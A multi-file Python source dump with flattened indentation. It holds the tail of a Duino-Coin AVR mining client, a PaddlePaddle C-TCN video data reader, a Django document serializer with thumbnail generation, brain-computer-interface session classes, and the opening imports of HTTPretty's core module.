diff = get_prefix(diff)
if feedback == 'GOOD':
# If result was correct
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.GREEN
+ ' ⛏'
+ get_string('accepted')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
elif feedback == 'BLOCK':
# If block was found
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.CYAN
+ ' ⛏'
+ get_string('block_found')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
else:
# If result was incorrect
shares[1] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.RED
+ ' ✗'
+ get_string('rejected')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = shares[0] - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
hashrate,
uptime)
start_time = time()
break
except Exception as e:
pretty_print(
'net0',
get_string('connecting_error')
+ Style.NORMAL
+ ' (main loop err: '
+ str(e)
+ ')',
'error')
debug_output('Main loop error: ' + str(e))
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
get_string('periodic_mining_report')
+ Fore.RESET
+ Style.NORMAL
+ get_string('report_period')
+ str(seconds)
+ get_string('report_time')
+ get_string('report_body1')
+ str(shares)
+ get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3')
+ get_string('report_body4')
+ str(int(hashrate)) + " H/s"
+ get_string('report_body5')
+ str(int(hashrate*seconds))
+ get_string('report_body6')
+ get_string('total_mining_time')
+ str(uptime), "success")
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + get_string('uptime_seconds')
elif uptime == 60:
return str(round(uptime // 60)) + get_string('uptime_minute')
elif uptime >= 60:
return str(round(uptime // 60)) + get_string('uptime_minutes')
elif uptime == 3600:
return str(round(uptime // 3600)) + get_string('uptime_hour')
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string('uptime_hours')
if __name__ == '__main__':
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True, convert=True)
else:
init(autoreset=True)
# Window title
title(get_string('duco_avr_miner') + str(MINER_VER) + ')')
try:
# Load config file or create new one
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0',
get_string('load_config_error')
+ RESOURCES_DIR
+ get_string('load_config_error_warning')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Error reading configfile: ' + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
greeting()
debug_output('greeting displayed')
except Exception as e:
debug_output('Error displaying greeting message: ' + str(e))
try:
# Launch avr duco mining threads
threadid = 0
for port in avrport:
thrThread(
target=mine_avr,
args=(port, threadid)).start()
threadid += 1
except Exception as e:
debug_output('Error launching AVR thread(s): ' + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
init_rich_presence()
thrThread(
target=update_rich_presence).start()
except Exception as e:
debug_output('Error launching Discord RPC thread: ' + str(e))
|
ctcn_reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import os
import random
import cv2
import sys
import numpy as np
import gc
import copy
import multiprocessing
import logging
logger = logging.getLogger(__name__)
try:
import cPickle as pickle
from cStringIO import StringIO
except ImportError:
import pickle
from io import BytesIO
from .reader_utils import DataReader
from models.ctcn.ctcn_utils import box_clamp1D, box_iou1D, BoxCoder
python_ver = sys.version_info
#random.seed(0)
#np.random.seed(0)
class CTCNReader(DataReader):
"""
Data reader for C-TCN model, which was stored as features extracted by prior networks
dataset cfg: img_size, the temporal dimension size of input data
root, the root dir of data
snippet_length, snippet length when sampling
filelist, the file list storing id and annotations of each data item
rgb, the dir of rgb data
flow, the dir of optical flow data
batch_size, batch size of input data
num_threads, number of threads of data processing
"""
def __init__(self, name, mode, cfg):
self.name = name
self.mode = mode
self.img_size = cfg.MODEL.img_size # 512
self.snippet_length = cfg.MODEL.snippet_length # 1
self.root = cfg.MODEL.root # root dir of data
self.filelist = cfg[mode.upper()]['filelist']
self.rgb = cfg[mode.upper()]['rgb']
self.flow = cfg[mode.upper()]['flow']
self.batch_size = cfg[mode.upper()]['batch_size']
self.num_threads = cfg[mode.upper()]['num_threads']
if (mode == 'test') or (mode == 'infer'):
self.num_threads = 1 # set num_threads as 1 for test and infer
def random_move(self, img, o_boxes, labels):
boxes = np.array(o_boxes)
mask = np.zeros(img.shape[0])
for i in boxes:
for j in range(i[0].astype('int'),
min(i[1].astype('int'), img.shape[0])):
mask[j] = 1
mask = (mask == 0)
bg = img[mask]
bg_len = bg.shape[0]
if bg_len < 5:
return img, boxes, labels
insert_place = random.sample(range(bg_len), len(boxes))
index = np.argsort(insert_place)
new_img = bg[0:insert_place[index[0]], :]
new_boxes = []
new_labels = []
for i in range(boxes.shape[0]):
new_boxes.append([
new_img.shape[0],
new_img.shape[0] + boxes[index[i]][1] - boxes[index[i]][0]
])
new_labels.append(labels[index[i]])
new_img = np.concatenate(
(new_img,
img[int(boxes[index[i]][0]):int(boxes[index[i]][1]), :]))
if i < boxes.shape[0] - 1:
new_img = np.concatenate(
(new_img,
bg[insert_place[index[i]]:insert_place[index[i + 1]], :]))
new_img = np.concatenate(
(new_img, bg[insert_place[index[len(boxes) - 1]]:, :]))
del img, boxes, mask, bg, labels
gc.collect()
return new_img, new_boxes, new_labels
def random_crop(self, img, boxes, labels, min_scale=0.3):
boxes = np.array(boxes)
labels = np.array(labels)
imh, imw = img.shape[:2]
params = [(0, imh)]
for min_iou in (0, 0.1, 0.3, 0.5, 0.7, 0.9):
for _ in range(100):
scale = random.uniform(0.3, 1)
h = int(imh * scale)
y = random.randrange(imh - h)
roi = [[y, y + h]]
ious = box_iou1D(boxes, roi)
if ious.min() >= min_iou:
params.append((y, h))
break
y, h = random.choice(params)
img = img[y:y + h, :]
center = (boxes[:, 0] + boxes[:, 1]) / 2
mask = (center[:] >= y) & (center[:] <= y + h)
if mask.any():
boxes = boxes[np.squeeze(mask.nonzero())] - np.array([[y, y]])
boxes = box_clamp1D(boxes, 0, h)
labels = labels[mask]
else:
boxes = [[0, 0]]
labels = [0]
return img, boxes, labels
def resize(self, img, boxes, size, random_interpolation=False):
'''Resize the input PIL image to given size.
If boxes is not None, resize boxes accordingly.
Args:
img: image to be resized.
boxes: (tensor) object boxes, sized [#obj,2].
size: (tuple or int)
- if is tuple, resize image to the size.
- if is int, resize the shorter side to the size while maintaining the aspect ratio.
random_interpolation: (bool) randomly choose a resize interpolation method.
Returns:
img: (cv2's numpy.ndarray) resized image.
boxes: (tensor) resized boxes.
Example:
>> img, boxes = resize(img, boxes, 600) # resize shorter side to 600
'''
h, w = img.shape[:2]
if h == size:
return img, boxes
if h == 0:
img = np.zeros((512, 402), np.float32)
return img, boxes
ow = w
oh = size
sw = 1
sh = float(oh) / h
method = random.choice([
cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA
]) if random_interpolation else cv2.INTER_NEAREST
img = cv2.resize(img, (ow, oh), interpolation=method)
if boxes is not None:
boxes = boxes * np.array([sh, sh])
return img, boxes
def transform(self, feats, boxes, labels, mode):
feats = np.array(feats)
boxes = np.array(boxes)
labels = np.array(labels)
#print('name {}, labels {}'.format(fname, labels))
if mode == 'train':
feats, boxes, labels = self.random_move(feats, boxes, labels)
feats, boxes, labels = self.random_crop(feats, boxes, labels)
feats, boxes = self.resize(
feats, boxes, size=self.img_size, random_interpolation=True)
h, w = feats.shape[:2]
img = feats.reshape(1, h, w)
Coder = BoxCoder()
boxes, labels = Coder.encode(boxes, labels)
if mode == 'test' or mode == 'valid':
feats, boxes = self.resize(feats, boxes, size=self.img_size)
h, w = feats.shape[:2]
img = feats.reshape(1, h, w)
Coder = BoxCoder()
boxes, labels = Coder.encode(boxes, labels)
return img, boxes, labels
def create_reader(self):
"""reader creator for ctcn model"""
if self.num_threads == 1:
return self.make_reader()
else:
return self.make_multiprocess_reader()
def make_reader(self):
"""single process reader"""
def reader():
with open(self.filelist) as f:
reader_list = f.readlines()
if self.mode == 'train':
random.shuffle(reader_list)
fnames = []
total_boxes = []
total_labels = []
total_label_ids = []
for i in range(len(reader_list)):
line = reader_list[i]
splited = line.strip().split()
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, splited[0] + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, splited[0] + '.pkl'))
if not (rgb_exist and flow_exist):
print('file not exist', splited[0])
continue
fnames.append(splited[0])
frames_num = int(splited[1]) // self.snippet_length
num_boxes = int(splited[2])
box = []
label = []
for i in range(num_boxes):
c = splited[3 + 3 * i]
xmin = splited[4 + 3 * i]
xmax = splited[5 + 3 * i]
box.append([
float(xmin) / self.snippet_length,
float(xmax) / self.snippet_length
])
label.append(int(c))
total_label_ids.append(i)
total_boxes.append(box)
total_labels.append(label)
num_videos = len(fnames)
batch_out = []
for idx in range(num_videos):
fname = fnames[idx]
try:
if python_ver < (3, 0):
rgb_pkl = pickle.load(
open(
os.path.join(self.root, self.rgb, fname +
'.pkl')))
flow_pkl = pickle.load(
open(
os.path.join(self.root, self.flow, fname +
'.pkl')))
else:
rgb_pkl = pickle.load(
open(
os.path.join(self.root, self.rgb, fname +
'.pkl')),
encoding='bytes')
flow_pkl = pickle.load(
open(
os.path.join(self.root, self.flow, fname +
'.pkl')),
encoding='bytes')
data_flow = np.array(flow_pkl['scores'])
data_rgb = np.array(rgb_pkl['scores'])
if data_flow.shape[0] < data_rgb.shape[0]:
data_rgb = data_rgb[0:data_flow.shape[0], :]
elif data_flow.shape[0] > data_rgb.shape[0]:
data_flow = data_flow[0:data_rgb.shape[0], :]
feats = np.concatenate((data_rgb, data_flow), axis=1)
if feats.shape[0] == 0 or feats.shape[1] == 0:
feats = np.zeros((512, 1024), np.float32)
logger.info('### file loading len = 0 {} ###'.format(
fname))
boxes = copy.deepcopy(total_boxes[idx])
labels = copy.deepcopy(total_labels[idx])
feats, boxes, labels = self.transform(feats, boxes, labels,
self.mode)
labels = labels.astype('int64')
boxes = boxes.astype('float32')
num_pos = len(np.where(labels > 0)[0])
except:
logger.info('Error when loading {}'.format(fname))
continue
if (num_pos < 1) and (self.mode == 'train' or
self.mode == 'valid'):
#logger.info('=== no pos for ==='.format(fname, num_pos))
continue
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((feats, boxes, labels))
elif self.mode == 'test':
batch_out.append(
(feats, boxes, labels, total_label_ids[idx]))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_multiprocess_reader(self):
"""multiprocess reader"""
def read_into_queue(reader_list, queue):
fnames = []
total_boxes = []
total_labels = []
total_label_ids = []
#for line in reader_list:
for i in range(len(reader_list)):
line = reader_list[i]
splited = line.strip().split()
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, splited[0] + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, splited[0] + '.pkl'))
if not (rgb_exist and flow_exist):
logger.info('file not exist {}'.format(splited[0]))
continue
fnames.append(splited[0])
frames_num = int(splited[1]) // self.snippet_length
num_boxes = int(splited[2])
box = []
label = []
for i in range(num_boxes):
c = splited[3 + 3 * i]
xmin = splited[4 + 3 * i]
xmax = splited[5 + 3 * i]
box.append([
float(xmin) / self.snippet_length,
float(xmax) / self.snippet_length
])
label.append(int(c))
total_label_ids.append(i)
total_boxes.append(box)
total_labels.append(label)
num_videos = len(fnames)
batch_out = []
for idx in range(num_videos):
fname = fnames[idx]
try:
if python_ver < (3, 0):
rgb_pkl = pickle.load(
open(
os.path.join(self.root, self.rgb, fname +
'.pkl')))
flow_pkl = pickle.load(
open(
os.path.join(self.root, self.flow, fname +
'.pkl')))
else:
rgb_pkl = pickle.load(
open(
os.path.join(self.root, self.rgb, fname +
'.pkl')),
encoding='bytes')
flow_pkl = pickle.load(
open(
os.path.join(self.root, self.flow, fname +
'.pkl')),
encoding='bytes')
data_flow = np.array(flow_pkl['scores'])
data_rgb = np.array(rgb_pkl['scores'])
if data_flow.shape[0] < data_rgb.shape[0]:
data_rgb = data_rgb[0:data_flow.shape[0], :]
elif data_flow.shape[0] > data_rgb.shape[0]:
data_flow = data_flow[0:data_rgb.shape[0], :]
feats = np.concatenate((data_rgb, data_flow), axis=1)
if feats.shape[0] == 0 or feats.shape[1] == 0:
feats = np.zeros((512, 1024), np.float32)
logger.info('### file loading len = 0 {} ###'.format(
fname))
boxes = copy.deepcopy(total_boxes[idx])
labels = copy.deepcopy(total_labels[idx])
feats, boxes, labels = self.transform(feats, boxes, labels,
self.mode)
labels = labels.astype('int64')
boxes = boxes.astype('float32')
num_pos = len(np.where(labels > 0)[0])
except:
logger.info('Error when loading {}'.format(fname))
continue
if (not (num_pos >= 1)) and (self.mode == 'train' or
self.mode == 'valid'):
#logger.info('=== no pos for {}, num_pos = {} ==='.format(fname, num_pos))
continue
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((feats, boxes, labels))
elif self.mode == 'test':
batch_out.append(
(feats, boxes, labels, total_label_ids[idx]))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
queue.put(batch_out)
batch_out = []
queue.put(None)
def queue_reader():
with open(self.filelist) as f:
fl = f.readlines()
if self.mode == 'train':
random.shuffle(fl)
n = self.num_threads
queue_size = 20
reader_lists = [None] * n
file_num = int(len(fl) // n)
for i in range(n):
if i < len(reader_lists) - 1:
tmp_list = fl[i * file_num:(i + 1) * file_num]
else:
tmp_list = fl[i * file_num:]
reader_lists[i] = tmp_list
queue = multiprocessing.Queue(queue_size)
p_list = [None] * len(reader_lists)
# for reader_list in reader_lists:
for i in range(len(reader_lists)):
reader_list = reader_lists[i]
p_list[i] = multiprocessing.Process(
target=read_into_queue, args=(reader_list, queue))
p_list[i].start()
reader_num = len(reader_lists)
finish_num = 0
while finish_num < reader_num:
sample = queue.get()
if sample is None:
finish_num += 1
else:
yield sample
for i in range(len(p_list)):
if p_list[i].is_alive():
p_list[i].join()
return queue_reader
|
serializers.py
|
from datetime import datetime
import tempfile
import logging
import os
import threading
from django.core.files.uploadedfile import SimpleUploadedFile
from wand.image import Image
from rest_framework import serializers
from .models import Directory, Document
logger = logging.getLogger(__name__)
THUMBNAIL_CREATE_TIMEOUT = 30 # second
MAX_PDF_SIZE_FOR_THUMBNAIL = 200 * 1024 * 1024 # Bytes
class DirectorySerializer(serializers.ModelSerializer):
class Meta:
model = Directory
fields = ('id', 'url', 'name')
class DocumentSerializer(serializers.ModelSerializer):
directory_set = DirectorySerializer(many=True, read_only=True)
class Meta:
model = Document
fields = ('id', 'name', 'description', 'type', 'file', 'thumbnail', 'directory_set')
@staticmethod
def fill_document_type(validated_data):
content_type = validated_data['file'].content_type
if content_type.startswith('image/'):
validated_data['type'] = Document.TYPE_IMAGE
elif content_type == 'application/pdf':
validated_data['type'] = Document.TYPE_PDF
elif content_type.startswith('video/'):
validated_data['type'] = Document.TYPE_VIDEO
elif content_type.startswith('audio/'):
validated_data['type'] = Document.TYPE_AUDIO
elif content_type == 'application/vnd.android.package-archive':
validated_data['type'] = Document.TYPE_GOOGLE_APK
else:
validated_data['type'] = Document.TYPE_OTHERS
@staticmethod
def create_pdf_thumbnail(validated_data):
file_name = None
# use page[0] as thumbnail
with Image(filename=validated_data['file'].temporary_file_path() + '[0]') as img:
file_name = tempfile.mktemp(suffix='.png')
img.save(filename=file_name) # save to /tmp
if file_name is not None:
file_path = os.path.join('/tmp', file_name)
with open(file_name, 'rb') as f:
validated_data['thumbnail'] = SimpleUploadedFile(file_name, f.read())
def create(self, validated_data):
logger.debug('creating document ...')
self.fill_document_type(validated_data)
start = datetime.now()
if 'thumbnail' in validated_data:
return super().create(validated_data)
# generate thumbnail here
uploaded_file = validated_data['file']
content_type = uploaded_file.content_type
if content_type in ['image/jpeg', 'image/png']:
# copy the image for thumbnail
with open(uploaded_file.temporary_file_path(), 'rb') as f:
validated_data['thumbnail'] = SimpleUploadedFile(uploaded_file.name, f.read())
elif content_type in ['application/pdf']:
if uploaded_file.size < MAX_PDF_SIZE_FOR_THUMBNAIL:
t = threading.Thread(name='create-pdf-thumbnail',
target=self.create_pdf_thumbnail, args=(validated_data,))
t.start()
t.join(timeout=THUMBNAIL_CREATE_TIMEOUT)
if 'thumbnail' not in validated_data:
logger.warn('thumbnail is not generated for "%s" because of timeout.' % validated_data['name'])
else:
logger.warn('the pdf file "%s" is too large (>%d Bytes) to generate thumbnail.'
% (validated_data['name'], MAX_PDF_SIZE_FOR_THUMBNAIL))
logger.debug('%d secs elapsed for modifying the validated data.' % (datetime.now() - start).seconds)
return super().create(validated_data)
|
sessions.py
|
import time
import threading
import traceback
from joblib import load
from . import logger
from .dataCollector import DataStack
from .BCIDecoder import BCIDecoder
class TrainSession(object):
''' The train session
1. Automatically collecting data;
2. Stop to training the decoder;
3. Stop to save the data.
'''
def __init__(self, filepath):
''' Initialize the train module,
Args:
- @filepath: The data will be stored to the filepath;
'''
# Necessary parameters
self.filepath = filepath
# Start collecting data
self.ds = DataStack(filepath)
self.ds.start()
self.stopped = False
def receive(self, dct):
logger.debug(f'Training module received {dct}')
method = dct.get('method', None)
if method == 'stopSession':
# Stop training session,
# 1. Stop collecting data;
# 2. Generate decoder and save it to the disk;
# 3. Save the data to the disk
self.stopped = True
self.ds.stop()
self.ds.save()
self.ds.close()
logger.debug(f'Training module stopped')
return 0, dict(
method='sessionStopped',
sessionName='training',
)
return 1, dict(
method='error',
reason='invalidMessage',
raw='',
comment=f'Training module failed to parse {dct}'
)
class BuildSession(object):
''' The Session of Building BCIDecoder
1. Only response to startBuilding task;
2. Two modules are selected
- youbiaoqian module;
- wubiaoqian module;
'''
def __init__(self, filepath, decoderpath, sessionname):
''' Initialize the train module,
Args:
- @filepath: The path of the file to be stored;
- @decoderpath: The path of the decoder to be stored;
- @sessionname: The name of the session, 'youbiaoqian' or 'wubiaoqian'.
'''
# Necessary parameters
self.filepath = filepath
self.decoderpath = decoderpath
self.generate_decoder()
def generate_decoder(self):
# Generate and save decoder
data = load(self.filepath)
decoder = BCIDecoder()
decoderpath = self.decoderpath
# Train decoder
decoder.fit(data)
# Save decoder
decoder.save_model(decoderpath)
self.decoder = decoder
logger.info(f'Saved the decoder to {decoderpath}')
class ActiveSession(object):
''' The active session
1. Automatically collecting data;
2. Compute event timely;
3. Stop to save the data.
'''
def __init__(self, filepath, decoderpath, interval, send):
''' Initialize the active module,
Args:
- @filepath: The path of the file to be stored;
- @decoderpath: The path of the decoder;
- @interval: The path of the timely job;
- @send: The sending method.
'''
# Necessary parameters
self.filepath = filepath
self.interval = interval
# Start collecting data
self.ds = DataStack(filepath)
self.ds.start()
# Load the decoder
self.load_decoder(decoderpath)
self.timely_job(send)
self.stopped = False
logger.debug(
f'Active module starts as {filepath}, {decoderpath}, {interval}')
def load_decoder(self, decoderpath):
# Load decoder
self.decoder = BCIDecoder()
self.decoder.load_model(decoderpath)
logger.debug(f'Loaded decoder of "{decoderpath}"')
def _keep_active(self, send):
logger.debug(f'Active module timely job starts.')
while self.state == 'alive':
time.sleep(self.interval)
# Get data
d = self.ds.latest()
logger.debug(
f'Got the latest data from device, shape is {d.shape}')
if d.shape[1] < 4000:
logger.warning(
f'Not enough data for compute label, doing nothing')
continue
# Compute label
d[-1] = 0
d[-1, -1] = 33
d[-1, 0] = 22
label = self.decoder.predict(d)
logger.debug(f'Computed label of {label}')
out = dict(
method='labelComputed',
label=f'{label}'
)
send(out)
logger.debug(f'Active module timely job stops.')
def timely_job(self, send):
''' The timely job method
Args:
- @handler: The handler on time.
'''
self.state = 'alive'
thread = threading.Thread(target=self._keep_active, args=(send,))
thread.setDaemon(True)
thread.start()
def receive(self, dct):
logger.debug(f'Active module received {dct}')
method = dct.get('method', None)
name = dct.get('sessionName', None)
if method == 'stopSession' and name == 'wubiaoqian':
# Stop active session,
# 1. Stop collecting data;
# 2. Save the data to the disk
self.state = 'stopped'
self.stopped = True
self.ds.stop()
self.ds.save()
self.ds.close()
logger.debug(f'Active module stopped.')
return 0, dict(
method='sessionStopped',
sessionName='wubiaoqian',
)
return 1, dict(
method='error',
reason='invalidMessage',
raw='',
comment=f'Active module failed to parse {dct}'
)
class PassiveSession(object):
''' The passive session
1. Automatically collecting data;
2. Compute event on request;
3. Stop to save the data.
'''
def __init__(self, filepath, decoderpath, updatedecoderpath, update_count, send):
''' Initialize the passive module,
Args:
- @filepath: The path of the file to be stored;
- @decoderpath: The path of the decoder;
- @updatedecoderpath: The path of the updated decoder;
- @update_count: How many trials for update the module;
- @send: The sending method.
'''
# Necessary parameters
self.filepath = filepath
self.updatedecoderpath = updatedecoderpath
# Start collecting data
self.ds = DataStack(filepath,
autoDetectLabelFlag=True,
predict=self.predict)
self.ds.start()
# Load the decoder
self.load_decoder(decoderpath, update_count)
self.send = send
self.results = []
self.stopped = False
logger.debug(
f'Passive module starts as {filepath}, {decoderpath}, {update_count}')
def load_decoder(self, decoderpath, update_count):
# Load decoder
self.decoder = BCIDecoder(update_count)
self.decoder.load_model(decoderpath)
logger.debug(f'Loaded decoder of "{decoderpath}"')
def save_updatedecoder(self):
# Save the updated decoder
path = self.updatedecoderpath
self.decoder.save_model(path)
logger.info(f'Saved the updated decoder to {path}')
def predict(self):
try:
d = self.ds.latest()
label = self.decoder.predict(d)
if 11 in d[-1, :]:
true_label = 0
logger.debug(f'True label: {true_label}')
if 22 in d[-1, :]:
true_label = 1
logger.debug(f'True label: {true_label}')
logger.debug(f'Predicted label: {label}')
self.send(dict(
method='labelComputed',
label=f'{label}'
))
self.results.append([true_label, label])
except:
err = traceback.format_exc()
logger.warning(f'Failed on predict: {err}')
def receive(self, dct):
logger.debug(f'Passive module received {dct}')
method = dct.get('method', None)
name = dct.get('sessionName', None)
if method == 'stopSession' and name == 'youbiaoqian':
# Stop passive session,
# 1. Stop collecting data;
# 2. Save the data to the disk
self.stopped = True
self.ds.stop()
self.ds.save()
self.ds.close()
self.save_updatedecoder()
logger.debug(f'Passive module stopped.')
c = 0
n = 0
for t, p in self.results:
n += 1
if t == 1 and p == 1:
c += 1
if t == 0 and p == 0:
c += 1
accuracy = c / n
return 0, dict(
method='sessionStopped',
sessionName='youbiaoqian',
accuracy=f'{accuracy}'
)
return 1, dict(
method='error',
reason='invalidMessage',
raw='',
comment=f'Passive module failed to parse {dct}'
)
|
core.py
|
# <HTTPretty - HTTP client mock for Python>
# Copyright (C) <2011-2020> Gabriel Falcão <gabriel@nacaolivre.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import io
import codecs
import contextlib
import functools
import hashlib
import inspect
import logging
import itertools
import json
import types
import re
import socket
import tempfile
import threading
import traceback
import warnings
from functools import partial
from typing import Callable
from .compat import (
BaseClass,
BaseHTTPRequestHandler,
quote,
quote_plus,
urlencode,
encode_obj,
urlunsplit,
urlsplit,
parse_qs,
unquote_utf8,
)
from .http import (
STATUSES,
HttpBaseClass,
parse_requestline,
last_requestline,
)
from .utils import (
utf8,
decode_utf8,
)
from .errors import HTTPrettyError, UnmockedError
from datetime import datetime
from datetime import timedelta
from errno import EAGAIN
old_socket = socket.socket
old_SocketType = socket.SocketType
old_create_connection = socket.create_connection
old_gethostbyname = socket.gethostbyname
old_gethostname = socket.gethostname
old_getaddrinfo = socket.getaddrinfo
old_socksocket = None
old_ssl_wrap_socket = None
old_sslwrap_simple = None
old_sslsocket = None
old_sslcontext_wrap_socket = None
old_sslcontext = None
MULTILINE_ANY_REGEX = re.compile(r'.*', re.M)
hostname_re = re.compile(r'\^?(?:https?://)?[^:/]*[:/]?')
logger = logging.getLogger(__name__)
try: # pragma: no cover
import socks
old_socksocket = socks.socksocket
except ImportError:
socks = None
try: # pragma: no cover
import ssl
old_sslcontext_class = ssl.SSLContext
old_sslcontext = ssl.create_default_context()
old_ssl_wrap_socket = old_sslcontext.wrap_socket
try:
old_sslcontext_wrap_socket = ssl.SSLContext.wrap_socket
except AttributeError:
pass
old_sslsocket = ssl.SSLSocket
except ImportError: # pragma: no cover
ssl = None
try:
import _ssl
except ImportError:
_ssl = None
# used to handle error caused by ndg-httpsclient
try:
from requests.packages.urllib3.contrib.pyopenssl import inject_into_urllib3, extract_from_urllib3
pyopenssl_override = True
except Exception:
pyopenssl_override = False
try:
import requests.packages.urllib3.connection as requests_urllib3_connection
old_requests_ssl_wrap_socket = requests_urllib3_connection.ssl_wrap_socket
except ImportError:
requests_urllib3_connection = None
old_requests_ssl_wrap_socket = None
try:
import eventlet
import eventlet.green
except ImportError:
eventlet = None
DEFAULT_HTTP_PORTS = frozenset([80])
POTENTIAL_HTTP_PORTS = set(DEFAULT_HTTP_PORTS)
DEFAULT_HTTPS_PORTS = frozenset([443])
POTENTIAL_HTTPS_PORTS = set(DEFAULT_HTTPS_PORTS)
def FALLBACK_FUNCTION(x):
return x
class HTTPrettyRequest(BaseHTTPRequestHandler, BaseClass):
r"""
Represents a HTTP request. It takes a valid multi-line,
``\r\n`` separated string with HTTP headers and parse them out using
the internal `parse_request` method.
It also replaces the `rfile` and `wfile` attributes with :py:class:`io.BytesIO`
instances so that we guarantee that it won't make any I/O, neither
for writing nor reading.
It has some convenience attributes:
``headers`` -> a mimetype object that can be cast into a dictionary,
contains all the request headers
``method`` -> the HTTP method used in this request
``querystring`` -> a dictionary containing lists with the
attributes. Please notice that if you need a single value from a
